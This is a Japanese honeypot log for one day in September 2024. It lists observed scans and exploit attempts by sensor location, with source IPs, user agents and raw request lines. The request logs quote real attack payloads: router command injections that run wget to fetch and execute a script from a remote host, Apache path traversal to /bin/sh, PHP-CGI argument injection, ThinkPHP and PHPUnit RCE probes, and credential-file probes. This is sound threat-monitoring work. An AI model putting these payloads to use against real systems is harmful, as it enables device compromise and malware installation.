2024/09/07 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/09/07分です。

特徴

共通

TP-Link製品の脆弱性を狙うアクセス
CensysInspectによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
PHPの脆弱性(CVE-2024-4577)を狙うアクセス
aiohttpによるスキャン行為
/.awsへのスキャン行為

を確認しました。

Location:US

zgrabによるスキャン行為

を確認しました。

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
PHPの脆弱性(CVE-2024-4577)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Odinによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為

を確認しました。

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
PHPの脆弱性(CVE-2024-4577)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
Odinによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
Apache Solrへのスキャン行為
configファイルへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：105 (前日比：-232)
US：総アクセス数：75 (前日比：-122)
UK：総アクセス数：177 (前日比：-1)
SG：総アクセス数：235 (前日比：137)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.62.61.202	United Kingdom
1	37.114.63.58	Germany
1	45.79.181.223	United States
1	45.141.215.29	Netherlands
2	45.148.10.242	Romania
1	45.236.48.45	Brazil
1	64.62.156.120	United States
3	65.49.20.67	United States
1	80.82.77.202	United Kingdom
28	85.190.243.5	Germany
1	91.92.250.127	Bulgaria
1	91.92.251.246	Bulgaria
1	92.118.39.244	Romania
1	93.174.93.12	United Kingdom
3	94.156.68.162	Bulgaria
10	101.32.192.203	Singapore
1	107.170.80.26	United States
1	123.160.221.130	China
1	134.122.18.120	United States
4	135.125.244.48	France
9	135.125.246.189	France
10	143.244.143.137	United States
1	144.126.224.71	United States
3	176.58.117.195	United States
1	185.224.128.59	Netherlands
5	185.224.128.187	Netherlands
5	185.254.196.173	Ukraine
1	193.32.162.34	Romania
2	198.235.24.150	United States
1	199.45.155.66	United States
2	205.210.31.255	United States
1	206.168.34.118	United States

UserAgent一覧

件数	UserAgent
15	`-`
28	`Custom-AsyncHttpClient`
6	`Go-http-client/1.1`
2	`Hello`
1	`Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d`
1	`Microsoft URL Control - 6.00.8862`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0`
1	`Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11`
19	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Python/3.12 aiohttp/3.10.5`
10	`python-requests/2.32.3`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01\x18\x01`
1		`\x16\x03\x01\x01\xfa\x01`
9		`\x16\x03\x01`
2		`\x16\x03\x02\x01o\x01`
1	GET	`/.aws/`	HTTP/1.1
1	GET	`/.aws/config`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.config`	HTTP/1.1
1	GET	`/.env.bak`	HTTP/1.1
21	GET	`/.env`	HTTP/1.1
3	GET	`/.git/config`	HTTP/1.1
1	GET	`/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/cgi-bin/index.cgi`	HTTP/1.1
4	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154[.]216[.]19[.]10%3A88%2Ft%7Csh%3B%60)`	HTTP/1.1
4	GET	`/cgi-bin/luci/;stok=/locale`	HTTP/1.1
1	GET	`/cgi-bin/luci`	HTTP/1.1
1	GET	`/config/aws.yml`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/LICENSE/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
10	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	POST	`/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input`	HTTP/1.1
1	POST	`/php-cgi/php-cgi.exe?%ADd+cgi[.]force_redirect%3D0+%ADd+disable_functions%3D\"\"+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.8.11.202	Russia
1	45.33.80.243	United States
13	45.148.10.242	Romania
6	54.36.115.221	France
1	64.62.197.54	United States
1	64.62.197.56	United States
1	64.62.197.60	United States
1	80.82.77.202	United Kingdom
2	91.92.243.155	Bulgaria
1	91.92.249.4	Bulgaria
1	91.92.251.246	Bulgaria
1	91.92.253.147	Bulgaria
1	93.174.93.12	United Kingdom
3	94.156.68.162	Bulgaria
1	139.59.101.104	Singapore
2	152.42.174.244	United States
2	152.42.214.50	United States
2	152.42.214.140	United States
2	152.42.243.206	United States
1	157.245.32.88	United States
2	167.94.146.63	United States
1	172.169.190.141	United States
1	172.212.60.124	United Kingdom
3	178.79.147.229	United States
1	180.243.45.31	Indonesia
1	184.105.139.67	United States
1	185.82.219.179	United States
4	185.224.128.59	Netherlands
3	185.224.128.84	Netherlands
4	185.224.128.187	Netherlands
1	192.155.90.220	United States
1	193.32.162.34	Romania
2	198.46.142.203	United States
2	198.235.24.16	United States
2	198.235.24.44	United States
2	199.45.154.134	United States

UserAgent一覧

件数	UserAgent
23	`-`
11	`Go-http-client/1.1`
13	`Hello`
1	`Mozilla/5.0 (Linux; Android 8.0.0; XT1650) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 2.2; en-us; SCH-I800 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.110 Safari/537.36 Vivaldi/2.7.1628.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.88 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0 (Windows NT 6.0; rv:40.0) Gecko/20100101 Firefox/40.0`
8	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1`
2	`Mozilla/5.0 zgrab/0.x`
5	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
4		`\x16\x03\x01\x01\v\x01`
1		`\x16\x03\x01\x01\x18\x01`
1		`\x16\x03\x01\x01\xfb\x01`
10		`\x16\x03\x01`
3		`\x16\x03\x02\x01o\x01`
10	GET	`/.env`	HTTP/1.1
1	GET	`/.env`	HTTP/1.0
3	GET	`/.git/config`	HTTP/1.1
2	GET	`/_profiler/phpinfo`	HTTP/1.1
5	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi-bin/index.cgi`	HTTP/1.1
10	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154[.]216[.]19[.]10%3A88%2Ft%7Csh%3B%60)`	HTTP/1.1
14	GET	`/cgi-bin/luci/;stok=/locale`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	HEAD	`/robots.txt`	HTTP/1.0
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.8.11.202	Russia
44	8.220.210.24	Singapore
1	27.47.2.203	China
1	37.114.63.58	Germany
1	40.118.210.79	United States
14	45.148.10.242	Romania
1	46.101.93.126	United States
1	46.101.195.85	United States
3	52.76.71.100	United States
10	54.36.115.221	France
5	57.129.23.166	France
1	61.0.186.16	India
1	64.227.126.38	United States
1	65.49.20.68	United States
1	80.82.77.202	United Kingdom
2	83.97.73.245	Germany
2	91.92.243.155	Bulgaria
1	91.92.249.218	Bulgaria
1	91.92.251.246	Bulgaria
1	91.92.253.147	Bulgaria
2	91.191.209.202	Bulgaria
1	93.174.93.12	United Kingdom
1	94.156.66.116	Bulgaria
3	94.156.68.162	Bulgaria
1	95.214.27.194	Bulgaria
1	103.67.163.199	private ip address
1	103.133.111.209	Vietnam
4	104.248.17.127	United States
5	104.248.254.164	United States
1	109.71.253.196	Germany
1	134.122.65.2	United States
1	134.122.78.228	United States
2	134.209.241.176	United States
2	134.209.252.15	United States
1	139.59.101.104	Singapore
2	142.93.166.22	United States
2	159.65.7.205	United States
4	159.65.115.28	United States
1	161.35.217.187	United States
1	164.90.161.168	United States
1	164.90.174.119	United States
5	167.99.254.237	United States
1	172.105.128.12	United States
1	172.206.141.101	United Kingdom
3	184.105.139.70	United States
3	185.3.95.99	United States
6	185.224.128.59	Netherlands
6	185.224.128.84	Netherlands
7	185.224.128.187	Netherlands
2	198.235.24.114	United States
2	198.235.24.161	United States
2	206.168.34.122	United States
4	206.189.59.162	United States
4	207.154.217.111	United States

UserAgent一覧

件数	UserAgent
33	`-`
44	`Custom-AsyncHttpClient`
39	`Go-http-client/1.1`
1	`Googlebot-Video/1.0`
14	`Hello`
1	`Mozilla/5.0 (Linux; Android 7.1.2; Redmi 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 6.0; en-US; Redmi Note 4 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.13.0.1207 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 8.1.0; en-US; Infinix X624B Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.13.0.1207 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 SE 2.X MetaSr 1.0`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
17	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11`
12	`Mozilla/5.0 (compatible; Odin; https[:]//docs[.]getodin[.]com/)`
2	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`
1	`Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1`
1	`python-requests/2.26.0`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`\x03`
3		`\x16\x03\x01\x01$\x01`
1		`\x16\x03\x01\x01\v\x01`
1		`\x16\x03\x01\x01\x18\x01`
1		`\x16\x03\x01\x01\xfc\x01`
18		`\x16\x03\x01`
3		`\x16\x03\x02\x01o\x01`
21	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
3	GET	`/HNAP1`	HTTP/1.1
1	GET	`/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
2	GET	`/cdn-cgi/trace`	HTTP/1.1
3	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
17	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154[.]216[.]19[.]10%3A88%2Ft%7Csh%3B%60)`	HTTP/1.1
1	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F45[.]82[.]120[.]118%2F1%2F1.sh%3B+chmod+777+1[.]sh%3B+.%2F1.sh%3B%60)`	HTTP/1.1
16	GET	`/cgi-bin/luci/;stok=/locale`	HTTP/1.1
1	GET	`/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
3	GET	`/evox/about`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../tmp/index1`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php`	HTTP/1.1
1	GET	`/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello`	HTTP/1.1
1	GET	`/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/odinhttpcall1725626850`	HTTP/1.1
1	GET	`/odinhttpcall1725629888`	HTTP/1.1
1	GET	`/odinhttpcall1725630594`	HTTP/1.1
1	GET	`/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello`	HTTP/1.1
1	GET	`/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/query?q=SHOW+DIAGNOSTICS`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
3	GET	`/solr/admin/cores?action=STATUS&wt=json`	HTTP/1.1
3	GET	`/solr/admin/info/system`	HTTP/1.1
1	GET	`/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	GET	`/v2/_catalog`	HTTP/1.1
1	GET	`/vendor/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/LICENSE/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input`	HTTP/1.1
1	POST	`/login`	HTTP/1.1
1	POST	`/php-cgi/php-cgi.exe?%ADd+cgi[.]force_redirect%3D0+%ADd+disable_functions%3D\"\"+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input`	HTTP/1.1
3	POST	`/sdk`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.8.11.202	Russia
1	13.58.226.117	United States
44	13.76.58.221	United States
8	14.216.74.221	China
7	35.216.141.220	United States
1	37.114.63.58	Germany
2	45.95.169.177	Croatia
16	45.148.10.242	Romania
4	45.190.160.59	Brazil
1	45.230.66.131	Argentina
2	52.76.71.100	United States
13	54.36.115.221	France
5	57.129.23.166	France
1	57.152.56.133	Switzerland
1	64.62.197.81	United States
1	64.62.197.82	United States
1	64.62.197.84	United States
1	64.227.113.186	United States
2	80.82.77.202	United Kingdom
44	80.87.200.77	Russia
2	83.97.73.245	Germany
2	91.92.243.155	Bulgaria
2	91.92.251.246	Bulgaria
1	91.92.253.147	Bulgaria
1	94.156.66.116	Bulgaria
3	94.156.68.162	Bulgaria
1	95.214.27.194	Bulgaria
1	117.222.127.95	India
1	120.85.112.201	China
1	134.122.65.2	United States
3	134.209.242.194	United States
3	139.162.193.224	Netherlands
1	143.110.164.200	United States
2	159.65.7.205	United States
1	159.223.27.74	United States
4	159.223.27.131	United States
3	161.35.209.149	United States
1	161.35.217.28	United States
2	161.35.217.187	United States
3	164.90.161.168	United States
1	164.90.210.55	United States
1	167.71.35.122	United States
1	167.71.53.161	United States
2	167.94.138.46	United States
2	167.94.138.54	United States
2	167.94.145.110	United States
3	172.208.83.7	France
1	172.245.20.199	United States
1	184.105.139.70	United States
1	185.82.219.179	United States
3	185.224.128.59	Netherlands
2	185.224.128.62	Netherlands
5	185.224.128.84	Netherlands
3	185.224.128.187	Netherlands
1	193.32.162.34	Romania
1	194.50.16.62	United States
2	196.44.203.136	South Africa
1	198.46.142.203	United States
2	198.235.24.25	United States
2	205.210.31.92	United States
4	206.189.51.142	United States

UserAgent一覧

件数	UserAgent
33	`-`
88	`Custom-AsyncHttpClient`
24	`Go-http-client/1.1`
16	`Hello`
1	`Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1`
1	`Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1`
6	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.0; rv:40.0) Gecko/20100101 Firefox/40.0`
1	`Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux i686 (x86_64)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36`
22	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
8	`Mozilla/5.0 (compatible; Odin; https[:]//docs[.]getodin[.]com/)`
1	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
8	`Opera/9.30 (Nintendo Wii; U; ; 2071; Wii Shop Channel/1.0; en)`
1	`POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1`
6	`xfa1`

リクエスト内容一覧

